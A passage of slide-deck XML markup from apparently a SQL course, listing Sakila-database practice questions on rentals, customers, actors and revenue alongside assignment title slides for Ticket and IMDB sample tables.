          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4582425" y="619075"/>
            <a:ext cx="4470900" cy="4424400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-288925" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150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List the top 10 customers who have spent the most on rentals.</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Show the average rental rate for each film category.</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Retrieve the films with a rating of 'R' and a length greater than 150 minutes.</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Find the most frequently rented film.</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List the customers who have not made any rentals.</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Show the total revenue for each film category.</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Retrieve the names of actors who have not appeared in any films.</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List the films that have the word 'Love' in the title.</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Find the customers who have made rentals on more than one occasion.</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Retrieve the films that belong to more than one category.</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Show the customers who have spent more than $50 on rentals.</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List the films that are available for rent.</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Find the average rental rate for films released in 2005.</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Retrieve the names of customers who have rented films on the same day they registered.</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Show the films that have not been rented in the last 30 days.</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List the actors who have appeared in at least three films.</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Find the average replacement cost for films in the 'Action' category.</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Retrieve the customers who have rented the same film more than once.</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Show the films that have the lowest replacement cost.</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List the films that have more than one part (e.g., sequels).</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Find the total number of rentals for each staff member.</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Retrieve the films that have not been rented by a specific customer.</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Show the films that have a rental rate between $2 and $3.</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List the customers who have rented all films in a specific category.</a:t>
            </a:r>
            <a:endParaRPr sz="950">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-288925" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="950"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod" startAt="26"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="950">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Find the average length of films in each rating category.</a:t>
            </a:r>
            <a:endParaRPr sz="950">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="950">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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sp>
        <p:nvSpPr>
          <p:cNvPr id="3349" name="Google Shape;3349;p541"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="528575"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Q 2 :- </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Show the first 10 rows from the </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>actor</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2700">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> table</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2700">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3350" name="Google Shape;3350;p541"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="12967" l="0" r="18447" t="32363"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="235950" y="1467743"/>
            <a:ext cx="8596349" cy="3241458"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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p542"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="0"/>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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sakila - Advanced SQL Questions</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3356" name="Google Shape;3356;p542"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="105500" y="619075"/>
            <a:ext cx="4359300" cy="4524300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-279400" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="150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Retrieve the top 10 customers with the highest total spending on rentals and include the city they live in.</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List the films that have been rented the least number of times.</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Find the customer who has rented the most films in each category.</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Calculate the total revenue for each month in the year 2006.</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Identify customers who have rented films in all categories.</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Retrieve the films with the highest total rental revenue.</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List the top 5 actors who have appeared in films with the longest average length.</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Calculate the cumulative total revenue for each customer over time.</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Identify the films with the highest average rating for each category.</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Find the customers who have rented films continuously for more than 30 days.</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List the films that share actors with other films in the same category.</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Calculate the average gap (in days) between consecutive rentals for each customer.</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Identify customers who have rented all the films of a specific actor.</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Retrieve the films that have the same actors as a given film.</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List the customers who have rented films on weekdays more frequently than on weekends.</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Find the films that have been rented more than once in the same day.</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Calculate the average rental rate for films based on their language.</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Identify the actors who have appeared in films in at least two different languages.</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Retrieve the films that have been rented the least in each category.</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List the films where the lead actor has appeared in more than one film in the same year.</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Calculate the average number of rentals per customer for each city.</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Find the films that have been rented by customers from at least three different countries.</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Identify the customers whose rental habits have changed the most over the last year.</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List the films that have not been rented in the last 60 days.</a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-279400" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Retrieve the customers who have rented all films directed by a specific director.</a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3357" name="Google Shape;3357;p542"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4582425" y="619075"/>
            <a:ext cx="4470900" cy="4424400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Calculate the average rating for films released in each quarter of the year.</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Find the actors who have appeared in films of all genres.</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Identify the films that have been rented by the same customer more than once in a single day.</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List the films that have been rented more frequently on weekends.</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Retrieve the customers who have rented all films with a specific keyword in the description.</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Calculate the percentage of revenue contributed by each customer to the total revenue.</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Identify the films with the highest rental rates within each category.</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List the customers who have rented all films released in a specific year.</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Find the actors who have appeared in films of different lengths.</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Retrieve the films that have the same set of actors as a given film but in a different order.</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Calculate the average number of rentals per customer for each month.</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Identify the customers who have rented all films from the same language group.</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List the films that have been rented by all customers from a specific country.</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Find the films that have been rented more frequently during holiday seasons.</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Retrieve the customers who have rented films from all categories.</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Calculate the average rating for films released on weekdays and weekends.</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Identify the films that have been rented by a specific customer more than any other customer.</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List the films that have not been rented by customers from a specific country.</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Find the actors who have appeared in films of different ratings.</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Retrieve the films that have been rented by customers from the same city more than once.</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Calculate the average gap between consecutive rentals for films in each category.</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Identify the customers who have rented films in all languages.</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List the films that have the highest total rental revenue for each language.</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Find the actors who have appeared in films from all categories.</a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0" algn="l">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Retrieve the films that have been rented by the same customer on the same day of the week more than once.</a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="770"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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1" name="Shape 3361"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3362" name="Google Shape;3362;p543"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270275" y="1400475"/>
            <a:ext cx="8588100" cy="3386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3600">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Consider the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>TICKET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sample tables:</a:t>
            </a:r>
            <a:endParaRPr sz="3600">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3363" name="Google Shape;3363;p543"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="957300" y="611325"/>
            <a:ext cx="73161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SQL Assignments 6</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4800">
              <a:solidFill>
                <a:schemeClr val="accen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76"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1675400" y="83975"/>
            <a:ext cx="5243203" cy="4838698"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>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7" name="Shape 3367"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3368" name="Google Shape;3368;p544"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="75" y="11350"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="5284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69" name="Google Shape;3369;p544"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1006275" y="381426"/>
            <a:ext cx="6831375" cy="4207075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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3" name="Shape 3373"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3374" name="Google Shape;3374;p545"/>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3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ticket </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- Simple SQL Questions</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3375" name="Google Shape;3375;p5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Roboto"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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9" name="Shape 3379"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3380" name="Google Shape;3380;p546"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270275" y="1400475"/>
            <a:ext cx="8588100" cy="338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000">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Consider the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>IMDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sample tables:</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3381" name="Google Shape;3381;p546"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="957300" y="611325"/>
            <a:ext cx="73161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rPr>
              <a:t>SQL Assignments 7</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4800">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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5" name="Shape 3385"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3386" name="Google Shape;3386;p547"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="636675" y="584900"/>
            <a:ext cx="7664400" cy="34944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b="1" lang="en" sz="4000">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Live SQL Assignment</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>140+ Tables</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3387" name="Google Shape;3387;p547"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1147439" y="2033374"/>
            <a:ext cx="2588403" cy="2525227"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3388" name="Google Shape;3388;p547"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7205625" y="248925"/>
            <a:ext cx="1708550" cy="487025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3389" name="Google Shape;3389;p547"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="2467" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5567598" y="1668573"/>
            <a:ext cx="2623668" cy="2043085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3390" name="Google Shape;3390;p547"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3735840" y="2183373"/>
            <a:ext cx="2274921" cy="2319503"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>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4" name="Shape 3394"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3395" name="Google Shape;3395;p548"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414700" y="531250"/>
            <a:ext cx="8046900" cy="4184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852"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Write the SQL queries for the following: -</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
